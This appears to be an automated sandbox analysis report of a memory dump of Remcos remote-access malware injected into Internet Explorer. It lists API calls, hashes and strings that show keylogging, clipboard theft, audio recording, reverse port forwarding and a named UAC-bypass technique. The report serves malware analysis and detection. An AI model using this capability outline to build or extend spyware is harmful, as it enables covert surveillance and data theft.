                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 2fc1d5bec0af2bb66aed67c16a8a9b3ae12ed784abac4070e9c14b835f8a666e
                                                  • Instruction ID: 768dff514d26e982781109df54fd302fa52c26ecf6652978a8b31d82f1f10e36
                                                  • Opcode Fuzzy Hash: 2fc1d5bec0af2bb66aed67c16a8a9b3ae12ed784abac4070e9c14b835f8a666e
                                                  • Instruction Fuzzy Hash: 2A3150319501196AEB04FBA0DCA5DFDB77AEF10300F504159E50A633D0FF245E8ACEA4
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(02DE2B28,00000000,02DE52E8,00003000,00000004,00000000,00000001), ref: 02D77418
                                                  • GetCurrentProcess.KERNEL32(02DE2B28,00000000,00008000,?,00000000,00000001,00000000,02D77691,c:\program files (x86)\internet explorer\iexplore.exe), ref: 02D774D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: ecae1544ca6ab98da7c57639941025b07e42cd3e4cc51e7faea4a64492352f4f
                                                  • Instruction ID: 372059adcd724a68f5e48dfa305aed037dab172663c008e5b82caa1b6136ead5
                                                  • Opcode Fuzzy Hash: ecae1544ca6ab98da7c57639941025b07e42cd3e4cc51e7faea4a64492352f4f
                                                  • Instruction Fuzzy Hash: 09314F72A80704ABE611BF74EC49F16BBADEB44715F504C18F9529A344EB74DC148BB0
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D8D507
                                                    • Part of subcall function 02D8D5A0: RegisterClassExA.USER32(00000030), ref: 02D8D5EC
                                                    • Part of subcall function 02D8D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02D8D607
                                                    • Part of subcall function 02D8D5A0: GetLastError.KERNEL32 ref: 02D8D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02D8D53E
                                                  • lstrcpynA.KERNEL32(02DE4B70,Remcos,00000080), ref: 02D8D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,02DE4B58), ref: 02D8D56E
                                                  • TranslateMessage.USER32(?), ref: 02D8D57A
                                                  • DispatchMessageA.USER32(?), ref: 02D8D584
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02D8D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: 3a842f6fb239b5a46c3dbfe0de48bdc7ed7d671640a33aa83ae23c22c268c340
                                                  • Instruction ID: a054907b27f98e6ba1fe1ab5c0d94278ae73ea755cc5d6edb9ccbd6b8190eb13
                                                  • Opcode Fuzzy Hash: 3a842f6fb239b5a46c3dbfe0de48bdc7ed7d671640a33aa83ae23c22c268c340
                                                  • Instruction Fuzzy Hash: 86013075C80246EBEB10ABA1E80DFEA7BBCA781704F104456F54197380D7784C25CB60
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b4582cb17d16c3622c26d4d339829b1608a238b1df5b4d508c21064895db801
                                                  • Instruction ID: f8e94d77d7cac2969f2b0b4dc1f0eb717f5c710c3d64706c767738b84b7be793
                                                  • Opcode Fuzzy Hash: 1b4582cb17d16c3622c26d4d339829b1608a238b1df5b4d508c21064895db801
                                                  • Instruction Fuzzy Hash: 5BC1BE74E04249EFDF12DFA8C865BEDBBB6AF09300F184599E952AB381C7749D41CB60
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,02DC40DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 02DC3EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,02DC40DC,00000000,00000000,?,00000001,?,?,?,?), ref: 02DC3F32
                                                  • __alloca_probe_16.LIBCMT ref: 02DC3F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,02DC40DC,?,02DC40DC,00000000,00000000,?,00000001,?,?,?,?), ref: 02DC3FC5
                                                  • __alloca_probe_16.LIBCMT ref: 02DC4014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,02DC40DC,00000000,00000000,?,00000001,?,?,?,?), ref: 02DC3FDC
                                                    • Part of subcall function 02DB61B8: HeapAlloc.KERNEL32(00000000,02DA5349,?,?,02DA88C7,?,?,pth_unenc,?,?,02D7DE9D,02DA5349,?,?,?,?), ref: 02DB61EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,02DC40DC,00000000,00000000,?,00000001,?,?,?,?), ref: 02DC4058
                                                  • __freea.LIBCMT ref: 02DC4083
                                                  • __freea.LIBCMT ref: 02DC408F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                  • String ID:
                                                  • API String ID: 3256262068-0
                                                  • Opcode ID: 79d3953eaab1d8c67ed27e8e50ac1339c4be1d7d71d6a71d1a72b57322a632ed
                                                  • Instruction ID: 1624b58f1d722c5af6bbc9151f2594b5d7f0da3c055cc0f1676bb9fd57a59792
                                                  • Opcode Fuzzy Hash: 79d3953eaab1d8c67ed27e8e50ac1339c4be1d7d71d6a71d1a72b57322a632ed
                                                  • Instruction Fuzzy Hash: 4491A3B2E402179BDB618E64C850EEEBBB9AF49714F34869DE845E7380D735DC40CBA0
                                                  APIs
                                                    • Part of subcall function 02DB8295: GetLastError.KERNEL32(?,00000000,02DB1CC5,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB8299
                                                    • Part of subcall function 02DB8295: _free.LIBCMT ref: 02DB82CC
                                                    • Part of subcall function 02DB8295: SetLastError.KERNEL32(00000000,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB830D
                                                    • Part of subcall function 02DB8295: _abort.LIBCMT ref: 02DB8313
                                                  • _memcmp.LIBVCRUNTIME ref: 02DB54A4
                                                  • _free.LIBCMT ref: 02DB5515
                                                  • _free.LIBCMT ref: 02DB552E
                                                  • _free.LIBCMT ref: 02DB5560
                                                  • _free.LIBCMT ref: 02DB5569
                                                  • _free.LIBCMT ref: 02DB5575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: e0c1cd5426cd9958baf409174bf524f2ea5e4bc4c713b50d8bc950549ef99556
                                                  • Instruction ID: c275b434003cfad65b1c0237ff0b13e68cf81a86bef4bb2a6ba4785bf36e0062
                                                  • Opcode Fuzzy Hash: e0c1cd5426cd9958baf409174bf524f2ea5e4bc4c713b50d8bc950549ef99556
                                                  • Instruction Fuzzy Hash: 33B13875A01219DBDB25DF18D8A4BEDB7B5FF08304F9085AAD84AA7350E770AE90CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: a31ba0cb669288564dd10fb7fdd9318a4c9c687bfd2ae3c40c373d729b6f4e17
                                                  • Instruction ID: 718e8a47b8ed5a5ce67a630b951c73b620d7686db2ed8d1f41742226c662c5e7
                                                  • Opcode Fuzzy Hash: a31ba0cb669288564dd10fb7fdd9318a4c9c687bfd2ae3c40c373d729b6f4e17
                                                  • Instruction Fuzzy Hash: 7A7189386083438FDB24AF54D44473BBBE4EB88358F14482EE8868B350E774DD04CB92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                  • API String ID: 3578746661-168337528
                                                  • Opcode ID: 3db96b7a47e2020bbb2600a0046894775454b3521e1f9f27a068110560d7878b
                                                  • Instruction ID: d4cd55cebb9c385d645873b065e0787f61b6ebc30a50cf801907387858695e78
                                                  • Opcode Fuzzy Hash: 3db96b7a47e2020bbb2600a0046894775454b3521e1f9f27a068110560d7878b
                                                  • Instruction Fuzzy Hash: B7518731E442409BDB14FB34D859A6E77AAEB84304F400919E9498B3D4EF78CD1ECBE2
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,02DE4EF0,02DD5FB4,?,00000000,02D78037,00000000), ref: 02D77A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02D78037,00000000,?,?,0000000A,00000000), ref: 02D77A48
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,02D78037,00000000,?,?,0000000A,00000000), ref: 02D77A88
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 02D77AA5
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02D77AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02D77AE0
                                                    • Part of subcall function 02D74B96: WaitForSingleObject.KERNEL32(?,000000FF,00000000,02DE4F08,02D74C49,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74BA5
                                                    • Part of subcall function 02D74B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D7548B), ref: 02D74BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: dfa49bd54ec7d85f0eb6f756b8387bfdc139231f8ea3bfb699cade06fe33460c
                                                  • Instruction ID: dbfdc2e9c8c6de90b9261e806eead0184ffdba394336b3536dccab6d54c5d2d2
                                                  • Opcode Fuzzy Hash: dfa49bd54ec7d85f0eb6f756b8387bfdc139231f8ea3bfb699cade06fe33460c
                                                  • Instruction Fuzzy Hash: 223190725483469FD310EA60D8549EBF3A9FB94315F404E1DF58992280FB78DE48CFA6
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02D7A30E
                                                  • SetWindowsHookExA.USER32(0000000D,02D7A2DF,00000000), ref: 02D7A31C
                                                  • GetLastError.KERNEL32 ref: 02D7A328
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02D7A376
                                                  • TranslateMessage.USER32(?), ref: 02D7A385
                                                  • DispatchMessageA.USER32(?), ref: 02D7A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 02D7A33C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: c05ace2098f80a0a0baa53b090dc21fa08b6b7765199d478d5b0637576d39b51
                                                  • Instruction ID: af7ddf8003a5bb999734d3f4ba0c9987f131eb0559e6fd96d372e8a6fead860e
                                                  • Opcode Fuzzy Hash: c05ace2098f80a0a0baa53b090dc21fa08b6b7765199d478d5b0637576d39b51
                                                  • Instruction Fuzzy Hash: 7111B231940602ABC7107EB5A80986F77ACEB81714B600A29F8C2C2384FB348D14CBA1
                                                  APIs
                                                  • SendInput.USER32 ref: 02D89A25
                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 02D89A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 02D89A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 02D89A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 02D89AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 02D89AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 02D89AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 02D89B1C
                                                    • Part of subcall function 02D899CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 02D899D4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: 473390db9b2999a0e3cdf57935f15305d5b853a6bea60283b1d30fe680e47c69
                                                  • Instruction ID: e3cd389a08161aca4d5948ae7efad35d6d20877a34ebb5f610fe8fd5fbfbab05
                                                  • Opcode Fuzzy Hash: 473390db9b2999a0e3cdf57935f15305d5b853a6bea60283b1d30fe680e47c69
                                                  • Instruction Fuzzy Hash: C6314F2124C349A9E211EFA99C50BEBBBECDF89B44F04180FB5C457290DBB199488767
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 02D7A451
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 02D7A45D
                                                  • GetKeyboardLayout.USER32(00000000), ref: 02D7A464
                                                  • GetKeyState.USER32(00000010), ref: 02D7A46E
                                                  • GetKeyboardState.USER32(?), ref: 02D7A479
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02D7A49C
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02D7A4FC
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02D7A535
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
                                                  • Opcode ID: 0515e0ee0ceacb5cafd661c14c476932f0a1870aeb0a9e50874bf836da35bdc7
                                                  • Instruction ID: 32eee913a0096a42c13da374ebe3c1762afb10206dc3ee67d279d24fa9f8cdcd
                                                  • Opcode Fuzzy Hash: 0515e0ee0ceacb5cafd661c14c476932f0a1870aeb0a9e50874bf836da35bdc7
                                                  • Instruction Fuzzy Hash: 4C318272544305AFD700DEA0DC44FDB7BECEB88754F100C2AB68587290E7B1E958CBA2
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 02D8697C
                                                  • EmptyClipboard.USER32 ref: 02D8698A
                                                  • CloseClipboard.USER32 ref: 02D86990
                                                  • OpenClipboard.USER32 ref: 02D86997
                                                  • GetClipboardData.USER32(0000000D), ref: 02D869A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 02D869B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D869B9
                                                  • CloseClipboard.USER32 ref: 02D869BF
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID:
                                                  • API String ID: 2172192267-0
                                                  • Opcode ID: 7f9df0a3a466c36272c3b278c44a0b8a5b7dac053a8ccde0d36c0ce7f34401cf
                                                  • Instruction ID: 9702a881a7069141c67858189a5f0e5c5570d2d04833997a6a104e913e90dcd4
                                                  • Opcode Fuzzy Hash: 7f9df0a3a466c36272c3b278c44a0b8a5b7dac053a8ccde0d36c0ce7f34401cf
                                                  • Instruction Fuzzy Hash: 120152316446029FC714BB70E869AFAB7A5EF80701F60095DE586833C0EF358C15CA61
                                                  APIs
                                                  • _free.LIBCMT ref: 02DB9292
                                                  • _free.LIBCMT ref: 02DB92B6
                                                  • _free.LIBCMT ref: 02DB943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,02DCF244), ref: 02DB944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,02DE2764,000000FF,00000000,0000003F,00000000,?,?), ref: 02DB94C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,02DE27B8,000000FF,?,0000003F,00000000,?), ref: 02DB94F4
                                                  • _free.LIBCMT ref: 02DB9609
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 1607c93df2191b078e0b842ceb548af32d587ff417675fa194300b02b5778d78
                                                  • Instruction ID: 9756ca9229cc235e112df4ed254f6f253811d881994185d9191c9d30b663de2e
                                                  • Opcode Fuzzy Hash: 1607c93df2191b078e0b842ceb548af32d587ff417675fa194300b02b5778d78
                                                  • Instruction Fuzzy Hash: 2AC12771D44285EBDB22AF799870BEE7BADEF41310F14459ADA869B380D7318D42CF60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: cd00abef575eb9bcb4d7f72eba32de7c5cd9215c662d81dcd547ea928eddfce8
                                                  • Instruction ID: 9b0eb84b9c4126f0b7fd7269f70098b12bca3db50d3ad5a821883a6c3eb4f1e0
                                                  • Opcode Fuzzy Hash: cd00abef575eb9bcb4d7f72eba32de7c5cd9215c662d81dcd547ea928eddfce8
                                                  • Instruction Fuzzy Hash: 40618A75900206EFDB21DF68C941BAABBF9EF05710F24456EE949EB381E7709D41CBA0
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02DBBBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02DBB47E
                                                  • __fassign.LIBCMT ref: 02DBB4F9
                                                  • __fassign.LIBCMT ref: 02DBB514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02DBB53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,02DBBBB1,00000000,?,?,?,?,?,?,?,?,?,02DBBBB1,?), ref: 02DBB559
                                                  • WriteFile.KERNEL32(?,?,00000001,02DBBBB1,00000000,?,?,?,?,?,?,?,?,?,02DBBBB1,?), ref: 02DBB592
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 4bfc58695811fcd42260506e9c295a6e03fbaf6bb9ab85605e79a3d2c6916ae2
                                                  • Instruction ID: 878e6b379f2ddb9b27f689b65cfe83700786400a72d4a8bdb6217655aa0e3768
                                                  • Opcode Fuzzy Hash: 4bfc58695811fcd42260506e9c295a6e03fbaf6bb9ab85605e79a3d2c6916ae2
                                                  • Instruction Fuzzy Hash: 3B519EB0A00249DFCB11CFA8D895AEEBBF8EF09304F14455AE956E7381E7709D50CB61
                                                  APIs
                                                  • _strftime.LIBCMT ref: 02D71BD4
                                                    • Part of subcall function 02D71CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02D71D55
                                                  • waveInUnprepareHeader.WINMM(02DE2A88,00000020,00000000,?), ref: 02D71C86
                                                  • waveInPrepareHeader.WINMM(02DE2A88,00000020), ref: 02D71CC4
                                                  • waveInAddBuffer.WINMM(02DE2A88,00000020), ref: 02D71CD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav
                                                  • API String ID: 3809562944-3597965672
                                                  • Opcode ID: bfadaf8736ca1159eb4b2f9d269919dabc04fcc254aa98aea3e1681c3f942f49
                                                  • Instruction ID: e682e5a677a01f3219b389b0c82b7d17e68554ec50cf17b37afaec38f811b87e
                                                  • Opcode Fuzzy Hash: bfadaf8736ca1159eb4b2f9d269919dabc04fcc254aa98aea3e1681c3f942f49
                                                  • Instruction Fuzzy Hash: C9316D319483019BD724FB20E859AAEB7AAFB44310F404929E54E863D0FF349D19CF61
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c87138682f44e10cc56afcabaf52dd15deff433630f5bc40cfaa0a04c382d28
                                                  • Instruction ID: 8a34f4a0c14ea2690e6be942cf4f6cc89724c820d4821c5116d1d371fea962b0
                                                  • Opcode Fuzzy Hash: 7c87138682f44e10cc56afcabaf52dd15deff433630f5bc40cfaa0a04c382d28
                                                  • Instruction Fuzzy Hash: BC11D2B2904216ABCB216FB5DD14AAB7EADEFC5720B204619B856D7380DB34CC01CAF0
                                                  APIs
                                                    • Part of subcall function 02D8C048: GetCurrentProcess.KERNEL32(?,?,?,02D82240), ref: 02D8C059
                                                    • Part of subcall function 02D835E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 02D83605
                                                    • Part of subcall function 02D835E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 02D83622
                                                    • Part of subcall function 02D835E1: RegCloseKey.ADVAPI32(?), ref: 02D8362D
                                                  • StrToIntA.SHLWAPI(00000000,02DDCA08,00000000,00000000,00000000,02DE50F4,00000003,Exe,00000000,0000000E,00000000,02DD60CC,00000003,00000000), ref: 02D8B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 1866151309-2070987746
                                                  • Opcode ID: 806dfc01f37ca58702a881e8cf8d38eb84def1ad88d5e6084f8b247304af436a
                                                  • Instruction ID: 5052ce3a58ab9c772ad84bc4a05cb656ac696d8a73da91d013ab2d21c467dfe4
                                                  • Opcode Fuzzy Hash: 806dfc01f37ca58702a881e8cf8d38eb84def1ad88d5e6084f8b247304af436a
                                                  • Instruction Fuzzy Hash: 16115960A4810556EB04F368EC96E7FB71ACB90208F800A56E447A73C1FB149D0ACBF1
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,02DAA3D1,02DA933E), ref: 02DAA3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02DAA3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02DAA40F
                                                  • SetLastError.KERNEL32(00000000,?,02DAA3D1,02DA933E), ref: 02DAA461
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 96ec8b1117b3918fecc1ddb73d96f6a249132f1793f03429c0df671435fba803
                                                  • Instruction ID: 1ad5501fd975a6120b93d530d439c93030030dbc011cf4d5b2ad6fd6364a4c26
                                                  • Opcode Fuzzy Hash: 96ec8b1117b3918fecc1ddb73d96f6a249132f1793f03429c0df671435fba803
                                                  • Instruction Fuzzy Hash: 6101D8327492129E9A1536747CB8F7B2769EB413B4B304339FD1C993D0EFA18D10D550
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,c:\program files (x86)\internet explorer\iexplore.exe), ref: 02D7760B
                                                    • Part of subcall function 02D77538: _wcslen.LIBCMT ref: 02D7755C
                                                    • Part of subcall function 02D77538: CoGetObject.OLE32(?,00000024,02DD6528,00000000), ref: 02D775BD
                                                  • CoUninitialize.OLE32 ref: 02D77664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: [+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod$c:\program files (x86)\internet explorer\iexplore.exe
                                                  • API String ID: 3851391207-3078575637
                                                  • Opcode ID: 6aaeeec2b392bee21cf919485ee5ef6eeea4d2045f98827537524fc60f867ec4
                                                  • Instruction ID: e1c9c20c540e1a51cd0d6dc55d91e2d9dc41ce07bf58118febf29a3f61a62db2
                                                  • Opcode Fuzzy Hash: 6aaeeec2b392bee21cf919485ee5ef6eeea4d2045f98827537524fc60f867ec4
